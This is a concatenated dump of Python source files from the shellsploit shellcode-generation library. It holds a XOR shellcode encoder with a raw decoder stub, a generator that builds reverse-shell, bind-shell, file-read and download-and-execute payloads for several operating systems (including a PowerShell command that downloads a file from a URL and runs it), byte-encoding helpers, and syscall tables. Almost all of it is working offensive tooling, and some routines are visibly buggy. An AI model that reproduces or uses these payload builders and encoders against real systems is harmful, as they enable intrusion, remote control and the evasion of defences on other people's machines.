'\\x'.join(stager_shellcode.encode('hex')[i:i + 2] for i in range(0, len(stager_shellcode.encode('hex')), 2)) 87 | return EncoderModule(self.customized_shellcode).do_the_magic() 88 | 89 | 90 | -------------------------------------------------------------------------------- /shellsploit/database/Windows/xor.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # This xor encoder was developed completely by Justin Warner (@sixdub) 4 | # Thanks a lot for letting us add this in! 5 | 6 | import re 7 | import sys 8 | 9 | 10 | class EncoderModule: 11 | 12 | def __init__(self, shellcode, bad_chars=r"\x00"): 13 | self.author = "Justin Warner (@sixdub)" 14 | self.xor_key = 0x00 15 | self.shellcode = bytearray(shellcode.replace("\\x", "").decode("hex")) 16 | self.terminator = 0x00 17 | self.encoded_shellcode = "" 18 | self.encoded_payload_length = 0 19 | self.encoder_bad_chars = ["eb", "18", "5e", "8d", "3e", "31", "c0", "db", "8a", "1c", "06", "80", "f3", "88", "1f", "47", "40", "ef", "e8", "e3", "ff"] 20 | self.bad_chars = bad_chars 21 | self.set_bad_characters(bad_chars) 22 | self.do_the_magic() 23 | 24 | def have_bad_chars(self, incoming, chars): 25 | for b in chars: 26 | if b in incoming: 27 | return True 28 | return False 29 | 30 | def shellcode_to_ascii(self, shell_code): 31 | output = "" 32 | for b in shell_code: 33 | output += "\\x%02x" % b 34 | return output 35 | 36 | def set_bad_characters(self, bad_characters): 37 | if bad_characters is not None: 38 | final_bad_chars = [] 39 | #bad_characters = bad_characters.split('x') 40 | bad_characters = bad_characters.split("\\x") 41 | bad_characters = bad_characters[1:] 42 | 43 | # Do some validation on the received characters 44 | for item in bad_characters: 45 | if item == '': 46 | pass 47 | else: 48 | if len(item) == 2: 49 | # Thanks rohan (@cptjesus) for providing this regex code, and making me too lazy 50 | # to do it myself 51 | rohan_re_code = re.compile('[a-f0-9]{2}', flags=re.IGNORECASE) 52 | if rohan_re_code.match(item): 53 | final_bad_chars.append(item) 54 | self.bad_chars = [int("0x" + x, 16) for x in final_bad_chars] 55 | 56 | # Takes a blob as input with a single byte key and returns blob output 57 | def xor(self, x, key): 58 | output = bytearray("") 59 | for b in bytearray(x): 60 | output.append(b ^ key) 61 | return output 62 | 63 | def do_the_magic(self): 64 | # This is where the encoding happens 65 | encode = bytearray("") 66 | 67 | # Test all possible keys and see if it creates a bad char. If not, we have a winner! 68 | remove_count = 0 69 | for test_key in range(1, 255): 70 | if not self.have_bad_chars(self.xor(self.shellcode, test_key), self.bad_chars): 71 | self.xor_key = test_key 72 | break 73 | else: 74 | remove_count += 1 75 | 76 | # Ensure a key was found... if not, error out 77 | if self.xor_key == 0x00: 78 | print "[*] ERROR: No key found... Stop being so picky and change your bad chars!" 79 | exit 80 | else: 81 | # XOR all the things 82 | # Justin, your code comments are awesome 83 | for x in bytearray(self.shellcode): 84 | encode.append(x ^ self.xor_key) 85 | skipped_term = 0 86 | 87 | # Iterate over code to find a non-used terminating char 88 | # that is not a badchar 89 | for i in range(1, 255): 90 | if i in bytearray(encode) or i in self.bad_chars: 91 | skipped_term += 1 92 | else: 93 | self.terminator = i 94 | break 95 | 96 | # Build final payload with stub 97 | encode.append(self.terminator) 98 | decodestub = bytearray("\xeb\x18\x5e\x8d\x3e\x31\xc0\x31\xdb\x8a\x1c\x06\x80\xfb") 99 | decodestub.append(self.terminator) 100 | decodestub += bytearray("\x74\x0e\x80\xf3") 101 | decodestub.append(self.xor_key) 102 | decodestub += bytearray("\x88\x1f\x47\x40\xeb\xef\xe8\xe3\xff\xff\xff") 103 | complete = decodestub + encode 104 | self.encoded_payload_length = len(complete) 105 | 106 | # At this point, the shellcode is a byte array... now we convert to ASCII 107 | self.encoded_shellcode = self.shellcode_to_ascii(complete) 108 | return self.encoded_shellcode 109 | -------------------------------------------------------------------------------- /shellsploit/database/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/riusksk/shellsploit-library/9c0e1fec2d510cc1195194ce18f5b6f0aeface9f/shellsploit/database/__init__.py -------------------------------------------------------------------------------- /shellsploit/database/generator.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team------------------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/shellsploit-library 5 | # LICENSE : https://github.com/b3mb4m/shellsploit-library/blob/master/LICENSE 6 | #----------------------------------------------------------------------------# 7 | 8 | 9 | def generator(choose=None, shellcode=None, COMMAND=None, FILE=None, ip=None, port=None, URL=None, PASSWORD=None, MESSAGE=None, FILENAME=None): 10 | if choose == "linux86": 11 | if shellcode == "binsh_spawn": 12 | from .Linux86.bin_shx86 import Payload 13 | return Payload().getpayload() 14 | 15 | elif shellcode == "exec": 16 | from .Linux86.execc import Payload 17 | return Payload(execommand=COMMAND).getpayload() 18 | 19 | elif shellcode == "read": 20 | from .Linux86.readfilex86 import Payload 21 | from .stackconvert import stackconvertSTR 22 | return Payload(file=stackconvertSTR(FILE)).getpayload() 23 | 24 | elif shellcode == "download&exec": 25 | from .Linux86.download import Payload 26 | from .stackconvert import stackconvertSTR 27 | filename = URL.split("/")[-1] 28 | return Payload(url=stackconvertSTR(URL), filename=stackconvertSTR(filename)).getpayload() 29 | 30 | elif shellcode == "chmod": 31 | from .Linux86.chmod import Payload 32 | from .stackconvert import stackconvertSTR 33 | return Payload(file=filestackconvertSTR(FILE)).getpayload() 34 | 35 | elif shellcode == "tcp_bind": 36 | from .Linux86.tcp_bindx86 import Payload 37 | from .stackconvert import PORT 38 | return Payload(lport=PORT(port)).getpayload() 39 | 40 | elif shellcode == "reverse_tcp": 41 | from .Linux86.reverse_tcpx86 import Payload 42 | from .stackconvert import IP 43 | from .stackconvert import PORT 44 | return Payload(host=IP(ip), lport=PORT(port)).getpayload() 45 | 46 | elif choose == "linux64": 47 | if shellcode == "binsh_spawn": 48 | from .Linux64.bin_shx64 import Payload 49 | return Payload().getpayload() 50 | 51 | elif shellcode == "tcp_bind": 52 | from .Linux64.tcp_bindx64 import Payload 53 | from .stackconvert import PORT 54 | return Payload(lport=PORT(port)).getpayload() 55 | 56 | elif shellcode == "reverse_tcp": 57 | from .Linux64.reverse_tcpx64 import Payload 58 | from .stackconvert import IP 59 | from .stackconvert import PORT 60 | return Payload(host=IP(ip), lport=PORT(port)).getpayload() 61 | 62 | elif shellcode == "read": 63 | from .Linux64.readfilex64 import Payload 64 | from .stackconvert import plaintext 65 | return Payload(file=plaintext(FILE)).getpayload() 66 | 67 | elif choose == "linux": 68 | from .Linux.magic import merlin 69 | 70 | if shellcode == "binsh_spawn": 71 | from .Linux86.bin_shx86 import Payload 72 | x86 = Payload().getpayload() 73 | value = hex(len(x86.split("\\x")) - 1)[2:] 74 | value = "\\x{0}".format(value) 75 | from .Linux64.bin_shx64 import Payload 76 | return merlin(value) + x86 + Payload().getpayload() 77 | 78 | elif shellcode == "read": 79 | from .Linux86.readfilex86 import Payload 80 | from .stackconvert import stackconvertSTR 81 | from .stackconvert import plaintext 82 | x86 = Payload(file=plaintext(FILE)).getpayload() 83 | from .Linux64.readfilex64 import Payload 84 | value = hex(len(x86.split("\\x")) - 1)[2:] 85 | value = "\\x{0}".format(value) 86 | return merlin(value) + x86 + Payload(file=plaintext(FILE)).getpayload() 87 | 88 | elif shellcode == "reverse_tcp": 89 | from .Linux86.reverse_tcpx86 import Payload 90 | from .stackconvert import IP 91 | from .stackconvert import PORT 92 | x86 = Payload(host=IP(ip), lport=PORT(port)).getpayload() 93 | value = hex(len(x86.split("\\x")) - 1)[2:] 94 | value = "\\x{0}".format(value) 95 | from .Linux64.reverse_tcpx64 import Payload 96 | return merlin(value) + x86 + Payload(host=IP(ip), lport=PORT(port)).getpayload() 97 | 98 | elif shellcode == "tcp_bind": 99 | from .Linux86.tcp_bindx86 import Payload 100 | from .stackconvert import PORT 101 | x86 = Payload(lport=PORT(port)).getpayload() 102 | from .Linux64.tcp_bindx64 import Payload 103 | value = hex(len(x86.split("\\x")) - 1)[2:] 104 | value = "\\x{0}".format(value) 105 | return merlin(value) + x86 + Payload(lport=PORT(port)).getpayload() 106 | 107 | elif choose == "osx86": 108 | if shellcode == "tcp_bind": 109 | from .OSX86.tcp_bind import Payload 110 | from .stackconvert import PORT 111 | return Payload(lport=PORT(port)).getpayload() 112 | 113 | elif shellcode == "binsh_spawn": 114 | from .OSX86.bin_sh import Payload 115 | return Payload().getpayload() 116 | 117 | elif shellcode == "reverse_tcp": 118 | from .OSX86.reverse_tcp import Payload 119 | from .stackconvert import IP 120 | from .stackconvert import PORT 121 | return Payload(lport=PORT(port)).getpayload() 122 | 123 | elif choose == "osx64": 124 | if shellcode == "binsh_spawn": 125 | from .OSX64.bin_sh import Payload 126 | return Payload().getpayload() 127 | 128 | elif shellcode == "reverse_tcp": 129 | from .OSX64.reverse_tcp import Payload 130 | from .stackconvert import IP 131 | from .stackconvert import PORT 132 | return Payload(lport=PORT(port)).getpayload() 133 | 134 | elif shellcode == "tcp_bind": 135 | from .OSX64.tcp_bind import Payload 136 | from .stackconvert import PORT 137 | return Payload(lport=PORT(port)).getpayload() 138 | 139 | elif choose == "freebsdx86": 140 | if shellcode == "binsh_spawn": 141 | from .FreeBSDx86.bin_sh import Payload 142 | return Payload().getpayload() 143 | 144 | elif shellcode == "read": 145 | from .FreeBSDx86.read import Payload 146 | from .plaintext import plaintext 147 | return Payload(file=plaintext(FILE)).getpayload() 148 | 149 | elif shellcode == "reverse_tcp": 150 | from .FreeBSDx86.reverse_tcp import Payload 151 | from .stackconvert import IP 152 | from .stackconvert import PORT 153 | return Payload(lport=PORT(port)).getpayload() 154 | 155 | elif shellcode == "tcp_bind": 156 | from .FreeBSDx86.tcp_bind import Payload 157 | if len(str(ip)) == 5: 158 | PORT = "\\x{0}\\x{1}".format((hex(int(ip))[2:][0:2], hex(int(ip))[2:][2:])) 159 | else: 160 | PORT = "\\x{0}\\x{1}".format(("0" + hex(int(ip))[2:][0], hex(int(ip))[2:][1:])) 161 | return Payload(lport=PORT).getpayload() 162 | 163 | elif shellcode == "exec": 164 | from .FreeBSDx86.execc import Payload 165 | from .plaintext import plaintext 166 | command = '/bin/sh -c {0}'.format(argv) 167 | return Payload(execommand=plaintext(COMMAND)).getpayload() 168 | 169 | elif choose == "freebsdx64": 170 | if shellcode == "binsh_spawn": 171 | from .FreeBSDx64.bin_sh import Payload 172 | return Payload().getpayload() 173 | 174 | elif shellcode == "exec": 175 | from .FreeBSDx64.execc import Payload 176 | return Payload(execommand=plaintext(COMMAND)).getpayload() 177 | 178 | elif shellcode == "tcp_bind": 179 | from .stackconvert import plaintext 180 | from .stackconvert import PORT 181 | from .FreeBSDx64.tcp_bind import Payload 182 | return Payload(lport=PORT(port), password=plaintext(PASSWORD)).getpayload() 183 | 184 | elif shellcode == "reverse_tcp": 185 | from .FreeBSDx64.reverse_tcp import Payload 186 | from .stackconvert import IP 187 | from .stackconvert import PORT 188 | return Payload(host=IP(ip), lport=PORT(port)).getpayload() 189 | 190 | elif choose == "linux_arm": 191 | if shellcode == "chmod": 192 | from .LinuxARM.chmod import Payload 193 | from .stackconvert import plaintext 194 | return Payload(file=plaintext(FILE)).getpayload() 195 | 196 | elif shellcode == "binsh_spawn": 197 | from .LinuxARM.bin_sh import Payload 198 | return Payload().getpayload() 199 | 200 | elif shellcode == "exec": 201 | from .LinuxARM.execc import Payload 202 | return Payload(execommand=COMMAND).getpayload() 203 | 204 | elif shellcode == "reverse_tcp": 205 | from .LinuxARM.reverse_tcp import Payload 206 | from .stackconvert import IP 207 | from .stackconvert import PORT 208 | return Payload(host=IP(ip), lport=PORT(port)).getpayload() 209 | 210 | elif choose == "linux_mips": 211 | if shellcode == "reverse_tcp": 212 | from .LinuxMIPS.reverse_tcp import Payload 213 | from .stackconvert import IP 214 | from .stackconvert import PORT 215 | return Payload(host=IP(ip), lport=PORT(port)).getpayload() 216 | 217 | elif shellcode == "binsh_spawn": 218 | from .LinuxMIPS.bin_sh import Payload 219 | return Payload.getpayload() 220 | 221 | elif shellcode == "chmod": 222 | from .LinuxMIPS.chmod import Payload 223 | from .stackconvert import plaintext 224 | return Payload(file=plaintext(FILE)).getpayload() 225 | 226 | elif shellcode == "tcp_bind": 227 | from .LinuxMIPS.tcp_bind import Payload 228 | from .stackconvert import PORT 229 | return Payload(lport=PORT(port)).getpayload() 230 | 231 | elif choose == "windows": 232 | if shellcode == "messagebox": 233 | from .Windows.messagebox import Payload 234 | from .stackconvert import stackconvertSTR 235 | return Payload(message=stackconvertSTR(MESSAGE, True)).getpayload() 236 | 237 | elif shellcode == "downloandandexecute": 238 | from .Windows.downloadandexecute import Payload 239 | from .stackconvert import rawSTR 240 | from .stackconvert import stackconvertSTR 241 | if FILENAME == "None": 242 | FILENAME = URL.split("/")[-1] 243 | powershell = '''powershell -command "& { (New-Object Net.WebClient).DownloadFile('%s', '%s') ;(New-Object -com Shell.Application).ShellExecute('%s');}"''' % (URL, FILENAME, FILENAME) 244 | return Payload(payload=stackconvertSTR(powershell)).getpayload() 245 | 246 | elif shellcode == "exec": 247 | from .Windows.execc import WinExec 248 | return WinExec(COMMAND) 249 | 250 | elif shellcode == "tcp_bind": 251 | from .Windows.bind_tcp import PayloadModule 252 | return PayloadModule(port).gen_shellcode() 253 | 254 | elif shellcode == "reverse_tcp": 255 | from .Windows.rev_tcp import PayloadModule 256 | return PayloadModule(ip, port).gen_shellcode() 257 | 258 | elif choose == "solarisx86": 259 | if shellcode == "read": 260 | from .Solarisx86.read import Payload 261 | from .plaintext import plaintext 262 | return Payload(file=plaintext(FILE)).getpayload() 263 | 264 | elif shellcode == "reverse_tcp": 265 | from .Solarisx86.reverse_tcp import Payload 266 | from .stackconvert import IP 267 | from .stackconvert import PORT 268 | return Payload(host=IP(ip), lport=PORT(port)).getpayload() 269 | 270 | elif shellcode == "binsh_spawn": 271 | from .Solarisx86.bin_sh import bin_sh 272 | return bin_sh() 273 | 274 | elif shellcode == "tcp_bind": 275 | from .Solarisx86.tcp_bind import Payload 276 | from .stackconvert import PORT 277 | return Payload(lport=PORT(port)).getpayload() 278 | -------------------------------------------------------------------------------- /shellsploit/database/stackconvert.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team------------------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/shellsploit-library 5 | # LICENSE : https://github.com/b3mb4m/shellsploit-library/blob/master/LICENSE 6 | #----------------------------------------------------------------------------# 7 | 8 | 9 | 10 | from re import findall 11 | import codecs 12 | 13 | 14 | def plaintext( string): 15 | string = codecs.encode(str.encode(string), 'hex') 16 | string = string.decode('utf-8') 17 | db = findall("..?", string) 18 | return "\\x"+"\\x".join(db) 19 | 20 | 21 | def plaintextreverse( string): 22 | string = codecs.encode(str.encode(string), 'hex') 23 | string = string.decode('utf-8') 24 | db = findall("..?", string) 25 | return "\\x"+"\\x".join(db[::-1]) 26 | 27 | 28 | def PORT( port): 29 | db = [] 30 | fixmesempai = findall('..?', hex(int(port))[2:]) 31 | for x in fixmesempai: 32 | if len(x) == 1: 33 | x = "0"+x 34 | db.append(x) 35 | return "\\x"+"\\x".join(db) 36 | 37 | 38 | def IP( ip): 39 | #0x101017f : 127.1.1.1 40 | ip = str(ip).split(".") 41 | db = [] 42 | db2 = [] 43 | for x in ip: 44 | db.append(hex( int(x))[2:]) 45 | for x in db: 46 | if len(x) == 1: 47 | x = "0"+x 48 | db2.append(x) 49 | return "\\x"+"\\x".join(db2) 50 | 51 | 52 | def rawSTR( string): 53 | db = [] 54 | for x in string: 55 | first = codecs.encode(str.encode(x), 'hex') 56 | x = first.decode('utf-8') 57 | db.append("\\x"+x) 58 | return "".join(db) 59 | 60 | 61 | def ARM( string): 62 | db = [] 63 | if "/" in string: 64 | if len(string) % 4 == 0: 65 | string = string 66 | elif len(string) % 4 == 1: 67 | string = filler( string, 4) 68 | elif len(string) % 4 == 2: 69 | string = filler( string, 3) 70 | elif len(string) % 4 == 3: 71 | string = filler( string, 2) 72 | for x in range(0,len(string),4): 73 | db.append(ARMsplitter(string[x:x+4])) 74 | return "".join(db) 75 | 76 | 77 | def ARMsplitter( hexdump, pushdword="None"): 78 | db = [] 79 | if pushdword == "None": 80 | fixmesempai = findall('....?', hexdump) 81 | for x in fixmesempai[::-1]: 82 | first = codecs.encode(str.encode(x[::-1]), 'hex') 83 | first = first.decode('utf-8') 84 | second = findall("..?", first)[::-1] 85 | db.append("\\x"+"\\x".join(second)) 86 | return "".join(db) 87 | 88 | 89 | def stackconvertSTR( string, win=False): 90 | db = [] 91 | if len(string) == 1: 92 | string = codecs.encode(str.encode(string), 'hex') 93 | string = string.decode('utf-8') 94 | return r"\x6a"+r"\x"+string 95 | 96 | if "/" in string: 97 | if len(string) % 4 == 0: 98 | string = string 99 | elif len(string) % 4 == 1: 100 | string = filler( string, 4) 101 | elif len(string) % 4 == 2: 102 | string = filler( string, 3) 103 | elif len(string) % 4 == 3: 104 | string = filler( string, 2) 105 | for x in range(0,len(string),4): 106 | db.append(splitter(string[x:x+4])) 107 | return "".join(db[::-1]) 108 | #return "".join(db) 109 | 110 | #Linux_x86 111 | #68 PUSH DWORD 112 | #6668 PUSH WORD 113 | #6A PUSH BYTE 114 | if len(string) == 4: 115 | first = codecs.encode(str.encode(string[::-1]), 'hex') 116 | stack = first.decode('utf-8') 117 | data = findall("..?", stack) 118 | return "\\x68\\x"+"\\x".join(data) 119 | 120 | 121 | elif len(string) % 4 == 0: 122 | for x in range(0,len(string),4): 123 | db.append(splitter(string[x:x+4])) 124 | if win == True: 125 | return "".join(db[::-1]) #Windows 126 | else: 127 | return "".join(db) #Unix,Linux etc.. 128 | 129 | elif 2 < len(string) < 4: 130 | first = codecs.encode(str.encode(hexdump[::-1]), 'hex') 131 | first = first.decode('utf-8') 132 | second = findall("..?", first)[::-1] 133 | for x in second: 134 | db.append("\\x"+x) 135 | return "\\x66\\x68"+"".join(db) 136 | 137 | 138 | else: 139 | db = [] 140 | for x in range(0,len(string),4): 141 | if len(string[x:x+4]) == 4: 142 | db.append(splitter(string[x:x+4])) 143 | else: 144 | db.append(splitter(string[x:x+4], "WordTime")) 145 | if win == True: 146 | return "".join(db[::-1]) #Windows 147 | else: 148 | return "".join(db) #Unix,Linux etc..) 149 | 150 | 151 | def filler( string, number): 152 | string = [x for x in string] 153 | for x in range(0, len(string)): 154 | if string[x] == "/": 155 | string[x] = "/"*number 156 | break 157 | return "".join(string) 158 | 159 | 160 | def splitter( hexdump, pushdword="None"): 161 | db = [] 162 | if pushdword == "None": 163 | fixmesempai = findall('....?', hexdump) 164 | for x in fixmesempai[::-1]: 165 | first = codecs.encode(str.encode(x[::-1]), 'hex') 166 | first = first.decode('utf-8') 167 | second = findall("..?", first)[::-1] 168 | db.append("\\x"+"\\x".join(second)) 169 | return "\\x68"+"".join(db) 170 | 171 | else: 172 | #Byte .. 173 | if len(hexdump) == 1: 174 | string = codecs.encode(str.encode(hexdump), 'hex') 175 | string = string.decode('utf-8') 176 | return r"\x6a"+r"\x"+string 177 | else: 178 | first = codecs.encode(str.encode(hexdump[::-1]), 'hex') 179 | first = first.decode('utf-8') 180 | second = findall("..?", first)[::-1] 181 | for x in second: 182 | db.append("\\x"+x) 183 | return "\\x66\\x68"+"".join(db) 184 | 185 | 186 | -------------------------------------------------------------------------------- /shellsploit/disassembly/Syscalls/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/riusksk/shellsploit-library/9c0e1fec2d510cc1195194ce18f5b6f0aeface9f/shellsploit/disassembly/Syscalls/__init__.py -------------------------------------------------------------------------------- /shellsploit/disassembly/Syscalls/freebsd_32.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team------------------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/shellsploit-library 5 | # LICENSE : https://github.com/b3mb4m/shellsploit-library/blob/master/LICENSE 6 | #----------------------------------------------------------------------------# 7 | 8 | 9 | list = { 10 | "syscall":"0", 11 | "exit":"1", 12 | "fork":"2", 13 | "read":"3", 14 | "write":"4", 15 | "open":"5", 16 | "close":"6", 17 | "wait4":"7", 18 | "link":"9", 19 | "unlink":"10", 20 | "chdir":"12", 21 | "fchdir":"13", 22 | "mknod":"14", 23 | "chmod":"15", 24 | "chown":"16", 25 | "break":"17", 26 | "getpid":"20", 27 | "mount":"21", 28 | "unmount":"22", 29 | "setuid":"23", 30 | "getuid":"24", 31 | "geteuid":"25", 32 | "ptrace":"26", 33 | "recvmsg":"27", 34 | "sendmsg":"28", 35 | "recvfrom":"29", 36 | "accept":"30", 37 | "getpeername":"31", 38 | "getsockname":"32", 39 | "access":"33", 40 | "chflags":"34", 41 | "fchflags":"35", 42 | "sync":"36", 43 | "kill":"37", 44 | "getppid":"39", 45 | "dup":"41", 46 | "pipe":"42", 47 | "getegid":"43", 48 | "profil":"44", 49 | "ktrace":"45", 50 | "getgid":"47", 51 | "getlogin":"49", 52 | "setlogin":"50", 53 | "acct":"51", 54 | "sigaltstack":"53", 55 | "ioctl":"54", 56 | "reboot":"55", 57 | "revoke":"56", 58 | "symlink":"57", 59 | "readlink":"58", 60 | "execve":"59", 61 | "umask":"60", 62 | "chroot":"61", 63 | "msync":"65", 64 | "vfork":"66", 65 | "sbrk":"69", 66 | "sstk":"70", 67 | "vadvise":"72", 68 | "munmap":"73", 69 | "mprotect":"74", 70 | "madvise":"75", 71 | "mincore":"78", 72 | "getgroups":"79", 73 | "setgroups":"80", 74 | "getpgrp":"81", 75 | "setpgid":"82", 76 | "setitimer":"83", 77 | "swapon":"85", 78 | "getitimer":"86", 79 | "getdtablesize":"89", 80 | "dup2":"90", 81 | "fcntl":"92", 82 | "select":"93", 83 | "fsync":"95", 84 | "setpriority":"96", 85 | "socket":"97", 86 | "connect":"98", 87 | "getpriority":"100", 88 | "bind":"104", 89 | "setsockopt":"105", 90 | "listen":"106", 91 | "gettimeofday":"116", 92 | "getrusage":"117", 93 | "getsockopt":"118", 94 | "readv":"120", 95 | "writev":"121", 96 | "settimeofday":"122", 97 | "fchown":"123", 98 | "fchmod":"124", 99 | "setreuid":"126", 100 | "setregid":"127", 101 | "rename":"128", 102 | "flock":"131", 103 | "mkfifo":"132", 104 | "sendto":"133", 105 | "shutdown":"134", 106 | "socketpair":"135", 107 | "mkdir":"136", 108 | "rmdir":"137", 109 | "utimes":"138", 110 | "adjtime":"140", 111 | "setsid":"147", 112 | "quotactl":"148", 113 | "nfssvc":"155", 114 | "lgetfh":"160", 115 | "getfh":"161", 116 | "getdomainname":"162", 117 | "setdomainname":"163", 118 | "uname":"164", 119 | "sysarch":"165", 120 | "rtprio":"166", 121 | "semsys":"169", 122 | "msgsys":"170", 123 | "shmsys":"171", 124 | "pread":"173", 125 | "pwrite":"174", 126 | "ntp_adjtime":"176", 127 | "setgid":"181", 128 | "setegid":"182", 129 | "seteuid":"183", 130 | "stat":"188", 131 | "fstat":"189", 132 | "lstat":"190", 133 | "pathconf":"191", 134 | "fpathconf":"192", 135 | "getrlimit":"194", 136 | "setrlimit":"195", 137 | "getdirentries":"196", 138 | "mmap":"197", 139 | "__syscall":"198", 140 | "lseek":"199", 141 | "truncate":"200", 142 | "ftruncate":"201", 143 | "__sysctl":"202", 144 | "mlock":"203", 145 | "munlock":"204", 146 | "undelete":"205", 147 | "futimes":"206", 148 | "getpgid":"207", 149 | "poll":"209", 150 | "__semctl":"220", 151 | "semget":"221", 152 | "semop":"222", 153 | "msgctl":"224", 154 | "msgget":"225", 155 | "msgsnd":"226", 156 | "msgrcv":"227", 157 | "shmat":"228", 158 | "shmctl":"229", 159 | "shmdt":"230", 160 | "shmget":"231", 161 | "clock_gettime":"232", 162 | "clock_settime":"233", 163 | "clock_getres":"234", 164 | "nanosleep":"240", 165 | "ntp_gettime":"248", 166 | "minherit":"250", 167 | "rfork":"251", 168 | "openbsd_poll":"252", 169 | "issetugid":"253", 170 | "lchown":"254", 171 | "getdents":"272", 172 | "lchmod":"274", 173 | "netbsd_lchown":"275", 174 | "lutimes":"276", 175 | "netbsd_msync":"277", 176 | "nstat":"278", 177 | "nfstat":"279", 178 | "nlstat":"280", 179 | "preadv":"289", 180 | "pwritev":"290", 181 | "fhopen":"298", 182 | "fhstat":"299", 183 | "modnext":"300", 184 | "modstat":"301", 185 | "modfnext":"302", 186 | "modfind":"303", 187 | "kldload":"304", 188 | "kldunload":"305", 189 | "kldfind":"306", 190 | "kldnext":"307", 191 | "kldstat":"308", 192 | "kldfirstmod":"309", 193 | "getsid":"310", 194 | "setresuid":"311", 195 | "setresgid":"312", 196 | "aio_return":"314", 197 | "aio_suspend":"315", 198 | "aio_cancel":"316", 199 | "aio_error":"317", 200 | "aio_read":"318", 201 | "aio_write":"319", 202 | "lio_listio":"320", 203 | "yield":"321", 204 | "mlockall":"324", 205 | "munlockall":"325", 206 | "__getcwd":"326", 207 | "sched_setparam":"327", 208 | "sched_getparam":"328", 209 | "sched_setscheduler":"329", 210 | "sched_getscheduler":"330", 211 | "sched_yield":"331", 212 | "sched_get_priority_max":"332", 213 | "sched_get_priority_min":"333", 214 | "sched_rr_get_interval":"334", 215 | "utrace":"335", 216 | "kldsym":"337", 217 | "jail":"338", 218 | "sigprocmask":"340", 219 | "sigsuspend":"341", 220 | "sigpending":"343", 221 | "sigtimedwait":"345", 222 | "sigwaitinfo":"346", 223 | "__acl_get_file":"347", 224 | "__acl_set_file":"348", 225 | "__acl_get_fd":"349", 226 | "__acl_set_fd":"350", 227 | "__acl_delete_file":"351", 228 | "__acl_delete_fd":"352", 229 | "__acl_aclcheck_file":"353", 230 | "__acl_aclcheck_fd":"354", 231 | "extattrctl":"355", 232 | "extattr_set_file":"356", 233 | "extattr_get_file":"357", 234 | "extattr_delete_file":"358", 235 | "aio_waitcomplete":"359", 236 | "getresuid":"360", 237 | "getresgid":"361", 238 | "kqueue":"362", 239 | "kevent":"363", 240 | "extattr_set_fd":"371", 241 | "extattr_get_fd":"372", 242 | "extattr_delete_fd":"373", 243 | "__setugid":"374", 244 | "nfsclnt":"375", 245 | "eaccess":"376", 246 | "nmount":"378", 247 | "kse_exit":"379", 248 | "kse_wakeup":"380", 249 | "kse_create":"381", 250 | "kse_thr_interrupt":"382", 251 | "kse_release":"383", 252 | "__mac_get_proc":"384", 253 | "__mac_set_proc":"385", 254 | "__mac_get_fd":"386", 255 | "__mac_get_file":"387", 256 | "__mac_set_fd":"388", 257 | "__mac_set_file":"389", 258 | "kenv":"390", 259 | "lchflags":"391", 260 | "uuidgen":"392", 261 | "sendfile":"393", 262 | "mac_syscall":"394", 263 | "getfsstat":"395", 264 | "statfs":"396", 265 | "fstatfs":"397", 266 | "fhstatfs":"398", 267 | "ksem_close":"400", 268 | "ksem_post":"401", 269 | "ksem_wait":"402", 270 | "ksem_trywait":"403", 271 | "ksem_init":"404", 272 | "ksem_open":"405", 273 | "ksem_unlink":"406", 274 | "ksem_getvalue":"407", 275 | "ksem_destroy":"408", 276 | "__mac_get_pid":"409", 277 | "__mac_get_link":"410", 278 | "__mac_set_link":"411", 279 | "extattr_set_link":"412", 280 | "extattr_get_link":"413", 281 | "extattr_delete_link":"414", 282 | "__mac_execve":"415", 283 | "sigaction":"416", 284 | "sigreturn":"417", 285 | "getcontext":"421", 286 | "setcontext":"422", 287 | "swapcontext":"423", 288 | "swapoff":"424", 289 | "__acl_get_link":"425", 290 | "__acl_set_link":"426", 291 | "__acl_delete_link":"427", 292 | "__acl_aclcheck_link":"428", 293 | "sigwait":"429", 294 | "thr_create":"430", 295 | "thr_exit":"431", 296 | "thr_self":"432", 297 | "thr_kill":"433", 298 | "_umtx_lock":"434", 299 | "_umtx_unlock":"435", 300 | "jail_attach":"436", 301 | "extattr_list_fd":"437", 302 | "extattr_list_file":"438", 303 | "extattr_list_link":"439", 304 | "kse_switchin":"440", 305 | "ksem_timedwait":"441", 306 | "thr_suspend":"442", 307 | "thr_wake":"443", 308 | "kldunloadf":"444", 309 | "audit":"445", 310 | "auditon":"446", 311 | "getauid":"447", 312 | "setauid":"448", 313 | "getaudit":"449", 314 | "setaudit":"450", 315 | "getaudit_addr":"451", 316 | "setaudit_addr":"452", 317 | "auditctl":"453", 318 | "_umtx_op":"454", 319 | "thr_new":"455", 320 | "MAXSYSCALL":"456" 321 | } 322 | 323 | #print list["execve"] 324 | # src/sys/kern/syscalls.master 325 | -------------------------------------------------------------------------------- /shellsploit/disassembly/Syscalls/linux_32.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team------------------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/shellsploit-library 5 | # LICENSE : https://github.com/b3mb4m/shellsploit-library/blob/master/LICENSE 6 | #----------------------------------------------------------------------------# 7 | 8 | 9 | def i386Systemcall( sys): 10 | list = { 11 | "restart_syscall":"0", 12 | "exit":"1", 13 | "fork":"2", 14 | "read":"3", 15 | "write":"4", 16 | "open":"5", 17 | "close":"6", 18 | "waitpid":"7", 19 | "creat":"8", 20 | "link":"9", 21 | "unlink":"10", 22 | "execve":"11", 23 | "chdir":"12", 24 | "time":"13", 25 | "mknod":"14", 26 | "chmod":"15", 27 | "lchown":"16", 28 | "break":"17", 29 | "oldstat":"18", 30 | "lseek":"19", 31 | "getpid":"20", 32 | "mount":"21", 33 | "umount":"22", 34 | "setuid":"23", 35 | "getuid":"24", 36 | "stime":"25", 37 | "ptrace":"26", 38 | "alarm":"27", 39 | "oldfstat":"28", 40 | "pause":"29", 41 | "utime":"30", 42 | "stty":"31", 43 | "gtty":"32", 44 | "access":"33", 45 | "nice":"34", 46 | "ftime":"35", 